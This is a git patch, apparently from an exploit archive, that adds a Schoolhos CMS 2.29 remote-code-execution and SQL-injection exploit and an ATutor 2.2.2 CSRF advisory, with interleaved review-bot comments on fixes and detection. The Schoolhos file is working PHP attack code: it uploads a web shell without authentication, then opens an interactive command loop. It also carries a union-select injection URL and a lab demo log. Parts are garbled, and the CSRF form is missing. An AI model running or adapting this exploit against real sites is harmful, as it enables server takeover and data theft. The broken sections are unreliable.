From 38e316551e27ef56b430b49c427848bdca39c200 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 14 Nov 2016 05:01:21 +0000
Subject: [PATCH] DB: 2016-11-14 2 new exploits Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)
---
 files.csv | 2 +
 platforms/php/webapps/40753.php | 165 +++++++++++++++++++++++
 platforms/php/webapps/40755.html | 217 +++++++++++++++++++++++++++++++
 3 files changed, 384 insertions(+)
 create mode 100755 platforms/php/webapps/40753.php
 create mode 100755 platforms/php/webapps/40755.html
diff --git a/files.csv b/files.csv
index a44aa2a73..8bf586700 100755
--- a/files.csv
+++ b/files.csv
@@ -36808,3 +36808,5 @@ id,file,description,date,author,platform,type,port
 40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
 40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
 40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
+40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
+40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
diff --git a/platforms/php/webapps/40753.php b/platforms/php/webapps/40753.php
new file mode 100755
index 000000000..e42662367
--- /dev/null
+++ b/platforms/php/webapps/40753.php
@@ -0,0 +1,165 @@ +\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \ + 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload' + + php file can be ccessed via : http://HOST/PATH/file/materi/0x4148.php + +II - Unauthenticated sql injection + + File : elearningku/download.php + Line 6 + $file=mysql_query("SELECT * FROM sh_materi WHERE id_materi='$_GET[id]'"); + $r=mysql_fetch_array($file); + $filename=$r[file_materi]; + + header("Content-Type: octet/stream"); + header("Pragma: private"); + header("Expires: 0"); + header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); + header("Cache-Control: private",false); + header("Content-Type: $ctype"); + header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" ); + header("Content-Transfer-Encoding: binary"); + header("Content-Length: ".filesize($dir.$filename)); + readfile("$dir$filename"); + + POC : versi_2.29/elearningku/download.php?id=-1' union select 1,version(),3,4,5,6,7,8-- - + DB version will be showed as filename + +Script is really full of injection flaws , mentioning all of it is such waste of time + +Full exploitation Demo +~0x4148fo# php scho.php http://192.168.0.50/lab/scho/versi_2.29/ +[*] Schoolhos CMS 2.29 Remote command execution +[*] Author : Ahmed sultan (0x4148) +[*] Connect : 0x4148.com | 0x4148@gmail.com + + + Sending payload to http://192.168.0.50/lab/scho/versi_2.29/ + + Payload sent successfully + +0x4148@http://192.168.0.50/lab/scho/versi_2.29/# dir + Volume in drive C is OS_Install + Volume Serial Number is D60F-0795 + + Directory of C:\xampp\htdocs\lab\scho\versi_2.29\file\materi + +11/13/2016 02:03 AM . +11/13/2016 02:03 AM .. 
+11/13/2016 02:03 AM 47 0x4148.php
+11/30/2011 06:56 PM 8,522 aku.php
+11/29/2011 02:02 AM 74 Alar Reproduksi.rar
+11/29/2011 02:03 AM 74 albert.rar
+11/29/2011 08:25 PM 12,326 ari.png
+11/29/2011 08:27 PM 12,318 ari.rar
+11/29/2011 06:57 PM 74 cerita.rar
+11/29/2011 08:24 PM 0 contoh.txt
+11/29/2011 02:05 AM 74 dos.rar
+11/29/2011 02:01 AM 74 English1.rar
+12/12/2011 11:13 AM 117 index.html
+11/29/2011 02:10 AM 74 kekebalantubuh.rar
+11/29/2011 02:11 AM 74 masa jenis.rar
+11/29/2011 02:14 AM 74 office.rar
+11/29/2011 02:06 AM 74 paragraf.rar
+11/29/2011 02:04 AM 74 pemanasan.rar
+11/29/2011 02:00 AM 74 polakalimat.rar
+11/29/2011 02:15 AM 74 prepare.rar
+11/29/2011 02:13 AM 74 proklamator.rar
+11/29/2011 02:12 AM 74 sea games.rar
+11/29/2011 02:05 AM 74 soekarno.rar
+11/29/2011 02:09 AM 74 speaking.rar
+11/29/2011 02:15 AM 74 ulangan INDO.rar
+11/29/2011 02:11 AM 74 volume.rar
+ 24 File(s) 34,662 bytes
+ 2 Dir(s) 38,197,485,568 bytes free
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# exit
+
+~0x4148fo#
+
+*/
+$host=$argv[1];
+$target="$host/elearningku/proses.php?pilih=guru&untukdi=upload";
+echo "[*] Schoolhos CMS 2.29 Remote command execution\n";
+echo "[*] Author : Ahmed sultan (0x4148)\n";
+echo "[*] Connect : 0x4148.com | 0x4148@gmail.com\n\n";
+echo " + Sending payload to $host\n";
+fwrite(fopen("0x4148.php","w+"),'');
+$x4148upload = curl_init();
+curl_setopt($x4148upload, CURLOPT_URL, $target);
+curl_setopt($x4148upload, CURLOPT_USERAGENT, "mozilla");
+curl_setopt($x4148upload, CURLOPT_POST, 1);
+curl_setopt($x4148upload, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($x4148upload, CURLOPT_POSTFIELDS,array("fupload"=>"@".realpath("0x4148.php")));
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYHOST, 0);
+$result = curl_exec($x4148upload);
+curl_close($x4148upload);
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".base64_encode("echo '0x4148fo';"));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true);
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+if(!preg_match("#0x4148fo#",$outp)){
+echo " - Failed :(\n";
+die();
+}
+echo " + Payload sent successfully\n\n";
+while(0<1){
+echo "0x4148@$host# ";
+$command=trim(fgets(STDIN));
+if($command=='exit'){
+die();
+}
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".urlencode(base64_encode("echo '>>>>>';system('$command');echo '>>>>>';")));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true);
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+echo explode(">>>>>",$outp)[1]."\n";
+}
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/40755.html b/platforms/php/webapps/40755.html
new file mode 100755
index 000000000..3fa2d5ade
--- /dev/null
+++ b/platforms/php/webapps/40755.html
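Review bot: The advisory names two root causes but, unlike the ATutor entry added in the same commit, has no `Solution:` block, so the remediation has to be inferred from the PoC; it belongs after the `II - Unauthenticated sql injection` section. The upload path is `elearningku/proses.php?pilih=guru&untukdi=upload` accepting the `fupload` field without authentication and storing it under the web-served `file/materi/` directory, which the PoC then requests as a script, so the fix is an authentication check on that handler plus keeping uploads out of any script-executable location; the SQL side is `download.php` line 6 interpolating `$_GET[id]` into a `mysql_query` string, which a prepared statement through mysqli or PDO removes. For detection, the request shape in the code is stable: a multipart POST to that `proses.php` URL, then POSTs to `file/materi/<name>.php` carrying a single base64-encoded body parameter. The hunk's opening lines are garbled in this rendering, so the file header before `*/` cannot be reviewed here.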
@@ -0,0 +1,217 @@
+# Exploit Title: ATutor_2.2.2 Learning Management System
+# Cross-Site Request Forgery (Add New Course)
+# Date: 13-11-2016
+# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
+# Vendor: http://www.atutor.ca/
+# Exploit Author: Saravana Kumar
+# Contact: https://facebook.com/06saravanakumar
+# Category: webapps
+# Version: 2.2.2
+# Platform: PHP
+# Tested on: [Kali Linux 2.0 | Windows 7]
+# Email: 06saravanakumar@gmail.com
+# Affected URL:
+http://localhost/ATutor/mods/_core/courses/users/create_course.php
+
+==================================
+Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure + +########################### CSRF PoC ############################### +  + + <------ CSRF POC ------> + + +
+ +
+ + + +--------------------------------------------------------------------------- +  +Solution: +  +Patch is available. Install patch using the ATutor Patcher. + +Link to download patch: + +http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml +--------------------------------------------------------------------------- +
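Review bot: The disclosure timeline's last entry reads `2016-10-12: Public Disclosure`, which predates the `2016-11-07` report and the header's own `Date: 13-11-2016`; presumably `2016-11-12` was intended. The `# Exploit Title:` line carries only `ATutor_2.2.2 Learning Management System` and pushes the vulnerability class onto a second `#` line, so anything keyed on the title loses it; `# Exploit Title: ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)` would match the description this commit writes to files.csv. The PoC section between the `CSRF PoC` banner and `Solution:` is empty in this rendering, which looks like the HTML form was dropped during extraction rather than missing from the commit, so it cannot be reviewed here.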